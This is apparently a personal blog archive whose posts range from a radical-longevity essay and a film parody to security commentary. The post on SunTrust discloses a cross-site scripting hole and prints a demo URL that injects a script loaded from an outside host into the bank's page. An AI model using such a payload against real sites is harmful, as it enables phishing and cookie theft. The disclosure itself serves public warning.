Some Thoughts on Common Assumptions about Radical Longevity

Whenever I talk about the notion of radical longevity–essentially, finding ways to stop the aging process and with it the inevitability of death–I’m always surprised at the amount of resistance that idea encounters.

Some of the resistance comes from a fear of overpopulation, which I don’t think is supported by historical observation. One of the things we tend to see whenever a society becomes more prosperous and more long-lived is declining birthrate. Worldwide, longer lifespan is coupled very tightly to lower birthrate; many industrialized countries, in fact, actually have negative population growth, offset only by immigration. As the world advances in standard of living and in longevity, there’s no reason to believe birthrates won’t continue to decline.

Some of it is based on the notion that many people don’t seem to want to live forever. That’s fine; I’m quite fond of the notion that people should be able to choose, if they like. If a person doesn’t want to live for two hundred or five hundred or a thousand years, that seems perfectly reasonable to me, even if I don’t share that choice. I don’t advocate that anyone be forced to live forever; and on the flip side of the same coin, I’d appreciate if folks not advocate that I be forced to have a lifespan that’s only 70 or 80 years or whatever.

But some of it, I’m convinced, is due to the influence of some religious ideas that I think are both self-contradictory and toxic; and they’re ideas which have so subtly engrained themselves in American society that they’re held even by people who don’t consider themselves religious at all.


An objection I sometimes hear when I talk about increasing human lifespan is “What makes you think you deserve to live longer?” And that argument floors me every time I hear it.

It is interesting to me how common the notion that longer life is something that must be “earned” is. It’s an idea with deep roots in Christianity, of course; the promise of heaven for the righteous and hell for the wicked directly couples a person’s good behavior to the offer of eternal life. And there’s no doubt that Christian Protestant traditions have planted very deep roots indeed into the soil of American society. Libertarianism, for example, could be argued to be the little more than the Puritan work ethic dressed in modern language.

But curiously, this argument seems to be very limited in its scope. We rarely hear that people need to earn the right to live for 70 years, in spite of the fact that this is a good 30 years longer than the average life expectancy at the turn of the 20th century; apparently, sufficiently small and incremental extensions to lifespan escape the “you have to justify your life in order to earn this privilege” clause.

And effectively, that’s what the argument is: a presumption that an effectively unbounded lifespan is a privilege, not a right, and therefore something to be revoked upon insufficient demonstration of worth.

Taken to its (il)logical conclusion, one might postulate that if we start from the premise that long life is something that only the sufficiently righteous have earned, we might propose a system whereby people at the age of 20 or so–the nominal lifespan of early humans in nomadic hunter/gatherer societies–are tested on their worth, with those being deemed insufficiently worthy being taken out behind the chemical shed and shot. They might, I don’t know, even be seen as a resource, with their remains being liquified and fed to the living or something.

Yet I’ve never heard anyone, even those who say “What makes you think you deserve to live forever?”, propose such a thing. It seems that long life must be earned, but only up to a point; before that point, it’s a right, not a privilege.

And that’s where the whole philosophy falls apart.


It seems to me that many religions, particularly Christian religions, hold on the one hand that eternal life is something that must be earned, but cling on the other to the idea that life itself is sacred and that all living people (with some limitations and exclusions that vary from denomination to denomination, and may include gays, lesbians, heretics, atheists, convicted criminals, and/or brown people) have an intrinsic right to life.

This right to life is promoted most directly and actively when it comes to children and infants, with some folks believing so strongly in this essential right that they feel called upon to defend it by planting pipe bombs and shooting doctors.

And all of this strikes me as being a bit contradictory.

You see, from my perspective it looks a bit odd to say that life is something sacred, which is the most basic and most sacrosanct of all human rights–but only in limited quantities, to be determined by the average longevity of the folks around you plus perhaps a decade or two; anything more than that is a privilege to be earned. So presumably a Medieval artisan who declared his desire to live to be a hundred years old might be met with “What makes you think you deserve to live that long?” whereas a modern American might only be asked the same question if his desire were to be to reach, say, two or three hundred.

But what really gets me is the number of folks of no particular religious leanings, and occasionally even folks who identify as entirely atheistic, have bought into this notion. Life is precious, sure, but only if as it doesn’t last past a certain sell-by date, which is never clearly enumerated but definitely seems to be greater than 100 years or so. A person wanting to live for a hundred and sixty years might get a few raised eyebrows; a person wanting to live for a thousand will almost certainly be asked “how have you earned it?”

It seems to me that if life has intrinsic value, then the pursuit of that which frees us from the ravages of old age, the indignity of encroaching enfeeblement, and the ultimate insult of death must necessarily be a virtue; whereas if life is something which must be earned in order to be justified, then it seems entirely consistent and logical to make it an ongoing thing, perhaps with regular tests, and give an exemption only to those too young to have yet begun to work toward earning it.

But what you can’t do is have it both ways.

If you believe as I do that every death is a travesty, the permanent loss of a unique perspective on the universe, then even asking a question like “What have you done to earn it?” becomes an appalling insult. But then, I would say that I fall firmly in the “life is sacred” camp, perhaps even more than the folks who proclaim this principle on the part of some god or gods. And unlike those folks, I don’t attach an expiration date to the preciousness of life.

Email: The Next Brute-Force Attack Frontier

A few days ago, I got emails from a group of folks who said I’d sent them spam. This happens from time to time, as spammers tend to forge the “From” addresses in the spam emails they send.

A couple of those folks were kind enough to forward me samples of the spam emails with full headers, and as it turns out, they did in fact come from my email server, though with a Ukranian IP address.

It would seem there’s a spam group in Eastern Europe that is doing brute-force attacks on large numbers of email addresses, attempting to find the passwords for IMAP and SMTP accounts. I have an AOL email address whose password, foolishly, was a dictionary word–an uncommon word, to be sure, but a dictionary word nonetheless. This is the password that was compromised.

Since then, I’ve heard of a couple other folks who’ve had the same thing happen to them. Legitimate email accounts without highly secure passwords breached, apparently in brute-force attacks, and then used to send large volumes of spam.

So the lesson here: Choose secure email passwords! If your email account password is weak, it may end up being compromised.

He’s so CUTE!

Last Friday, we found this guy running around in the street. I went out and made friends with him, then we kept him in the back yard and gave him food and water ’til we could look for his owners. He didn’t have a collar or tags, and we couldn’t find an online lost dog report, so we brought him in to the vet to see if he had a microchip.

No dice.

So we brought him to a shelter. They found his owners the next day, but his owners didn’t want him back. I hate people who don’t take care of their pets–especially one as sweet and loving as this guy. Shelter says they will have no problem placing him. Preferably with a family who will actually care about him.

Mt. Hood in the spring

Yesterday evening, we headed out to go shopping for new light fixtures and more concrete for the house. Portland is often rainy, but last night was beautifully clear, and we stopped by the side of the road so I could snap this pic of Mt. Hood.

Franklin’s First Law of Communication

I’m sure most of the folks on my flist are probably at least passingly familiar with Godwin’s Law, which states “As an online discussion grows longer, the probability of a comparison involving Nazis or Hitler approaches 1.”

It’s been my observation over the past few years, and particularly over the past few months, that a similar law applies to any conversation about radical honesty within a relationship. I’ve participated in quite a few entirely separate conversations on the subject of communication on entirely different forums with entirely different people, and in nearly every case, someone somewhere has argued against the notion that a person ought to be able to share anything at all with a romantic partner in the same way.

So I’d like to propose a new law, which states: As an online discussion about communication or radical honesty grows longer, the probability that someone will say “Well, you don’t tell your partner every time you take a shit, do you?” approaches 1.

I’d further like to propose a corollary which says that the person making the comment about excretory functions, by making that statement, has demonstrated conclusively that he or she does not understand the value of open communication. Namely, that it’s not about telling your partner every minute detail of your life, it’s about being ABLE to talk to your partner about any subject whatsoever, without the feeling that there are certain topics that you Dare Not Broach for fear of Bad And Dramatic Things.

Home Improvement, the Old House Way

With summer fast approaching, I figured it was probably time to dig the window air conditioner out of the garage and set it up in the house. Fortunately, this is an easy task, usually requiring no more than ten minutes at the most, assuming you stop for a Mountain Dew halfway through. (And assuming it takes two minutes to get the Mountain Dew and another five to drink it.)

Since I’m feeling generous, I figured I’d share some of my famed goodwill and write this handy-dandy three-step guide to hanging a window air conditioner in a 1940s-era house, just in case it was too complex a job for someone on my flist to handle.

How to Hang a Window Air Conditioner in Three Easy Steps

Step 1: Take the air conditioner out of the box.
Step 2: Try to open the window.
Step 3: Realize it was painted shut some time during the Nixon administration, then again during the Ford, Reagan, Bush Sr., Clinton, and Bush Jr. administrations.
Step 4: Go to Home Depot and buy a razor knife.
Step 5: Cut the eighteen layers of paint along the inside AND the outside of the window.
Step 6: Raise the window an inch.
Step 7: Realize that the runner is also coated in eighteen layers of paint, half of which are probably lead based.
Step 8: Swear.
Step 9: Scrape paint.
Step 10: Scrape more paint.
Step 11: Muscle the window open.
Step 12: Place the air conditioner on the window sill.
Step 13: Attempt to plug in the air conditioner.
Step 14: Realize that the outlet immediately below the window is an old-fashioned 2-prong outlet rather than a 3-prong outlet.
Step 15: Swear.
Step 16: Go to Home Depot for a new wall outlet.
Step 17: Remove the face plate from the outlet.
Step 18: Discover old-fashioned 2-conductor cloth-covered aluminum wire with no ground lead behind the cover.
Step 19: Swear.
Step 20: Run an extension cord to the other outlet in the room, which thankfully is a modern 3-prong variety.
Step 21: Become suspicious.
Step 22: Plug a circuit tester into the 3-prong outlet.
Step 23: Discover that it may in fact be three prong, but it is not actually grounded.
Step 24: Swear.
Step 25: Remove the cover from the second outlet.
Step 26: Discover that the outlet is broken in the back, with exposed conductors that are dangerously close to touching one another.
Step 27: Swear.
Step 28: Return to Home Depot for more outlets.
Step 29: Rewire all of the outlets in the room. Remember to pull ground leads. (I hear this is important.)
Step 30: Plug a circuit tester into the outlets.
Step 31: Discover, much to your surprise, that the outlets now test good.
Step 32: Plug in the air conditioner.

And now, sit back and luxuriate in the modern technological miracle of climate control, basking in the knowledge of a 3-step, 10-minute job well done in only six hours and 32 steps!

Iron Man 2 in a Nutshell

I tried to avoid seeing this movie, really I did. Alas, in the end my own human weaknesses undid me; I was invited to it by a cute girl (and her boyfriend) and we all know the rest.

Iron Man 2 is a very Marvel Superheroes story–by which I mean bland, predictable, non-threatening, conservative, and more or less badly writte. The story goes something like this:

WARNING! Plot spoilers below!

Anton Vanko: I can teach you to make an arc reactor out of snow and empty vodka bottles.
Ivan Vanko: Cool. (He FEEDS his BIRD)
(Anton Vanko DIES)
Ivan Vanko: Nooooooooooooooo!! Do not want!
(He FEEDS his BIRD)
(He makes an ARC REACTOR out of SNOW and EMPTY VODKA BOTTLES)
(He EMPTIES some more VODKA BOTTLES)
(He FEEDS his BIRD again)
Tony Stark: Yo! You love me, I love me, let’s party!
Tony Stark’s Medical Gizmo: LOL surprise buttsecks. You are dying of palladium poisoning!
Tony Stark: Oh, crap.
Science Consultant: Wait, what? Palladium is an inert metal, like gold and platinum. It isn’t tox–
Jon Favreau: STFU.
Gwyneth Paltrow: I look like crap in this movie. Plus, I’m boring. And I have the charisma of a dead fish. What happened to my career? I used to do cool, quirky movies like Sliding Doors and Shakespeare in Love.
Tony Stark: I will make you CEO of my company.
Gwyneth Paltrow: Okay.
Tony Stark: I like Scarlett Johansson.
Garry Shandling: Give us the Iron Man suit.
Tony Stark: No.
Garry Shandling: Yes.
Tony Stark: No. I created world peace!
Audience: Wait, what? You’re just one guy. You mean to tell me that people who aren’t afraid of an aircraft carrier are afraid of just one guy?
Jon Favreau: STFU.
Tony Stark: I hate Justin Hammer.
Justin Hammer: I hate Tony Stark. Plus, I’m lame.
Tony Stark: I like car races.
Ivan Venko: I like car races.
(Ivan Venko WALKS ONTO THE RACE TRACK and CHOPS UP CARS)
(Tony Stark’s Driver RAMS IVAN VENKO with an ARMORED LIMOUSINE)
Tony Stark: Give me the suitcase!
Gwyneth Paltrow: No!
Tony Stark: Hit him with the car again! Break his legs!
Ivan Venko: You will not break my legs.
Tony Stark: Hit him with the car again! Pulverize his pelvis!
Ivan Venko: You will not pulverize my pelvis.
Tony Stark: Hit him with the car again! Break his back!
Ivan Venko: You will not break my back.
Tony Stark: Wait, what? Why?
Ivan Venko: Because this movie has PG rating.
Hit-Girl: My movie Kick Ass has an R rating. By this point in MY movie, I’ve killed more people than Mr. Blonde in Reservoir Dogs, and I’m, like, eight years old or something.
Jon Favreau: STFU.
Tony Stark: Give me the suitcase!
Gwyneth Paltrow: No!
Tony Stark: Give me the suitcase!
Gwyneth Paltrow: Okay.
(Tony Stark takes the SUITCASE, which unfolds and unfolds and unfolds into an IRON MAN SUIT)
Dr. Seuss: You TOTALLY stole that effect from my Star-Bellied Sneetches machine.
Tony Stark: Now I will kick your ass.
(Tony Stark FAILS to kick Ivan Venko’s ASS)
Tony Stark: Nice try. If you would have rerouted the turboencabulator through the main deflector dish, you would totally have pwn3d me.
Ivan Venko: Hello! My name is Ivan Montoyavich. Your father killed my father. Prepare to die.
Tony Stark: Did not.
Ivan Venko: Did so.
Tony Stark: Nuh-uh.
Ivan Venko: Uh-huh.
(The dialog WEDGES for a while, like a last-minute rewrite done by a summer intern in CRAYON)
Tony Stark: This dialog sucks. I’m out of here.
Justin Hammer: I will give you a bird if you give me Iron Man suits.
Ivan Venko: I will give you Iron Man suits.
(JUSTIN HAMMER gives IVAN VENKO a BIRD)
Ivan Venko: I will not give you Iron Man suits.
Justin Hammer: Wait, what?
Ivan Venko: I will give you killer robots.
Justin Hammer: Okay.
Tony Stark: Is this party jamming or what?
Gwyneth Paltrow: No.
Tony Stark: Is this party jamming or what?
Don Cheadle: No.
Tony Stark: Is this party jamming or what?
Scarlett Johansson: No.
Samuel L. Jackson: Stop eating donuts.
Tony Stark: Okay.
Samuel L. Jackson: Join my team.
Tony Stark: No.
Samuel L. Jackson: Scarlett Johansson is hot. Join my team.
Tony Stark: Her costume needs more cleavage. No.
Scarlett Johansson: This is a PG movie.
Tony Stark: Crap.
Samuel L. Jackson: You need me.
Tony Stark: Do not.
Samuel L. Jackson: Do so.
Tony Stark: Do not.
(The dialog WEDGES again)
Samuel L. Jackson: This dialog sucks. I’m out of here.
Howard Stark: I totally knew fifty years ago that you’d get blown up in the Middle East, end up with shrapnel in your heart, and then surgically implant an arc reactor in yourself. I have the secret to stop you from dying of palladium poisoning.
Tony Stark: Cool.
Howard Stark: Also, I’m Walt Disney.
Tony Stark: Wait, what?
Howard Stark: Anton Vanko helped me invent the arc reactor. I kicked him out of the country because he wanted to make money.
Audience: Wait, what? Aren’t you, like, a bajillionaire industrialist?
Howard Stark:
Tony Stark: Tell me the secret so I don’t die.
Howard Stark: No. I’ll just put a bunch of hidden clues in this big model train set. I sure hope nobody throws it away.
Tony Stark: I brought you strawberries!
Gwyneth Paltrow: I hate strawberries.
Scarlett Johansson: See me radiate an air of mystery and cunning, like Adam Sandler radiates fart jokes?
Tony Stark: Awkwardly, with bad comedic timing?
Scarlett Johansson:
Scarlett Johansson: Yes.
Tony Stark: I don’t like your paperweight.
Gwyneth Paltrow: I like my paperweight.
(The dialog WEDGES again.)
Gwyneth Paltrow: This dialog sucks. I’m out of here.
Scarlett Johansson: This dialog sucks. I’m out of here.
Tony Stark: Hey, look! An old model train set!
(Tony Stark cuts his HOUSE in half with a PARTICLE ACCELERATOR)
Computer Voice: You just created a new element.
Audience: *facepalm*
Science Consultant: Compound. Not element. Compound.
Tony Stark: I just cut my house in half with a particle accelerator. I can call it what I want, four-eyes!
Michael Bay: I want to cut a house in half with a particle accelerator! And then make it EXPLODE!
Megan Fox: You are SO lame. Who do I have to blow to get off of the cast of Transformers 3?
Justin Hammer: Give me killer robots.
Ivan Venko: No.
Justin Hammer: Give me back my bird.
(He TAKES Ivan Venko’s BIRD and his PILLOWS and his SHOES)
Ivan Venko: I’m going to enjoy watching you die, Mr. Hammer.
Justin Hammer: I’m not going to die. PG movie, remember?
Ivan Venko: Crap.
Justin Hammer: Love me, love me.
Crowd of people: You are SO lame.
Justin Hammer: I have killer robots!
Crowd of people: Cool.
Tony Stark: ‘Sup.
Don Cheadle: Yo.
(The KILLER ROBOTS go crazy. They shoot BOMBS and ROCKETS and stuff. Nobody DIES.)
Justin Hammer: I totally didn’t see that coming.
Audience: We totally did.
Scarlett Johansson: Driver, take me to Justin Hammer’s place. I will get undressed in the back of the car.
Driver:
Scarlett Johansson: You can’t see my tits. This is a PG movie.
Driver: Crap.
Scarlett Johansson: Too bad. They’re magnificent.
The Internet: We know.
(Scarlett Johansson KICKS a bunch of people’s ASSES. Since this is a PG movie, they all live.)
Scarlett Johansson: Hey Tony, there’s another killer robot chasing you.
Obi-Wan Kenobi: That’s no killer robot, it’s a space station!
Ivan Venko: I will kill you now.
Tony Stark: Nuh-uh.
Don Cheadle Nuh-uh.
(Tony Stark and Don Cheadle HIGH-FIVE and knock Ivan Venko over)
Ivan Venko: I will blow up myself and all the killer robots and I will kill you and Gwyneth Paltrow and thousands of other people.
Tony Stark: Nuh-uh. This is a PG movie.
Ivan Venko: Oh, cra–
(He BLOWS UP)
Gwyneth Paltrow: I don’t like being CEO.
Tony Stark: Let us have a romantic moment full of bad chemistry and awkward dialog, like Padme and Anakin in that one Star Wars movie.
Gwyneth Paltrow: Okay.
(They have a ROMANTIC MOMENT filled with BAD CHEMISTRY and AWKWARD DIALOG)
Gwyneth Paltrow: This sucks. I’m calling my agent. I need to get out of this movie.
Tony Stark: Too late. Movie’s over.
Gwyneth Paltrow:
Tony Stark: How do you think I feel? I’m a womanizer who never gets laid and a killing machine who never kills anyone.
Don Cheadle: That was the worst romantic interlude I’ve seen since that one Star Wars movie. I’m out of here.
Audience: So are we.

OUCH! SunTrust’s Web site is PWN3d!

I know some of my regular readers have accounts with SunTrust bank. If you do, and you recently received an email telling you that your account records need to be updated, and you clicked on any link in that email, change your account password IMMEDIATELY. It is not necessary for you to have typed in your account username and password at the prompt; the attack can lift the SunTrust cookies from your browser.

You see, SunTrust left a security hole in their Web server; this security hole allows an attacker to use what’s called a “cross site scripting” attack to take control of the pages you see when you browse to SunTrust URLs.

I have confirmed this security hole exists, and have created a quick demo to show how it works. If you click on this link:

Clicky here
[EDIT:] Within 5 minutes of my making this post, LiveJournal’s servers flagged the link as a cross-site scripting link and disabled it. Nicely done! Kudos to the LJ team for making their software aware of hostile links. If you want to try out my demo of the vulnerability, copy into your browser:

http://helpcenter.suntrust.com/doc/sn6400.xml?SID=586&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://www.obsidianfields.com/suntrustxssdemo/xssdemo.js

you will be taken to the Web site helpcenter.suntrust.com, a legitimate SunTrust Web page.

[UPDATE]: As of Wednesday afternoon, SunTrust’s IT people have fixed the XSS hole.

But wait! What do you see? If the security hole still exists when you visit this URL, you’ll see a red Web page reading “The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE”. What’s going on?

What’s going on is that helpcenter.suntrust.com can be fooled just by manipulating the URL into loading content from anywhere on the Web, overwriting whatever is supposed to be there. No, I don’t have access to the SunTrust servers directly, and neither does the attacker. What I CAN do is create a Web page with anything I want, and then create a link that causes my Web page to load at helpcenter.suntrust.com in place of what is supposed to be there. And, if I wanted to, I could also read SunTrust cookies stored in your browser as well, presumably including login cookies if you have ticked the “remember me” checkbox on SunTrust’s login page.

In English, that means you can not trust anything you see displayed at helpcenter.suntrust.com, even if you are 100% positive that the URL of your browser is in fact helpcenter.suntrust.com. It is trivial to create malicious links that change the content displayed at helpcenter.suntrust.com, as I haveshown in my example. This security hole is currently being used in a “phishing” attack that shows you what looks like a perfectly legitimate login page at helpcenter.suntrust.com, but is in fact a page under the control of the hacker on a hacked Web server in Australia.

Technical details under the cut

ecommerce.com: hacked by GHoST61

Last week, I was on a Web forum where someone taked about his Web site being defaced. He’d been running an insecure install of phpNUKE without keeping on top of security patches, and his site was taken down and replaced with a page reading “Hacked by GHoST61” and a picture of the first president of Turkey.

I did some investigating, and discovered that GHoST61 is a prolific Turkish hacker who defaces Web pages in a very characteristic way; he or she replaces the home page with the message “Hacked by GHoST61” and sometimes a picture of the Turkish president, sometimes a missive against the Iraqui war, and sometimes a combination of both.

GHoST61 generally strikes me as being more of a script kiddie than a serious, knowledgable hacker. A Google search for the phrase “Hacked by Goost61” currently turns up about 30,000 results, the majority of which look like sites running old, outdated, insecure installs of phpNUKE, Drupal, ZenCart, osCommerce, or other server apps with known security holes. The attacks are probably automated, with point-n-drool tools that search for known vulnerabilities in popular Web application and content management packages.

In other words, GHoST61, whoever he or she is, mostly goes after low-hanging fruit.

Mostly.

Just because it’s what I do, I started wading through the Google results and checking to see where the hacked sites were hosted. And I found something of a surprise.

I checked several results, and found the majority of them were living on a single ISP, ecommerce.com (which does Web hosting under the names iX Web Hosting and WebHost.biz).

Curious, I kept digging, choosing random Google results to examine (in case the order of the Google results were determined by time, and the hacker just happened to be searching in IP space belonging to ecommerce.com recently). What I discovered was that the majority of hacked sites all across Google’s results, by a large margin, were hosted in the same place.

The next thing I thought was that it could be simply a question of the ISP’s size. After all, if the Web sites that had been defaced were spread out evenly across many ISPs, and one ISP hosted a million sites whereas another ISP hosted only ten thousand sites, I’d expect to see more hacked sites hosted on the larger ISP, right?

But this didn’t hold water, either. The ISP ecommerce.com advertises that it hosts about 500,000 sites. Much larger Web hosting companies such as Peer 1 hosted a far smaller number of hacked sites.

So I started counting. I grabbed a bunch of Google results at random, looked to see who was hosting them, and recorded the results. Here’s what I found (number of hacked sites on the vertical axis, Web hosting company on the horizontal axis):

It seems to me that ecommerce.com has a problem here. While GHoST61 will hack vulnerable Web sites with security holes no matter where they’re hosted, there is a very, very large cluster of hacked sites living on ecommerce.com servers.

This may indicate that ecommerce.com doesn’t enforce good security practices, or that ecommerce.com is slow to respond to hack attacks. Or it may indicate a more systemic problem at ecommerce.com, such as some sort of server-level vulnerability that allows easy penetration of many of their Web sites.

Whatever the problem, it definitely appears that ecommerce.com has some sort of issue here.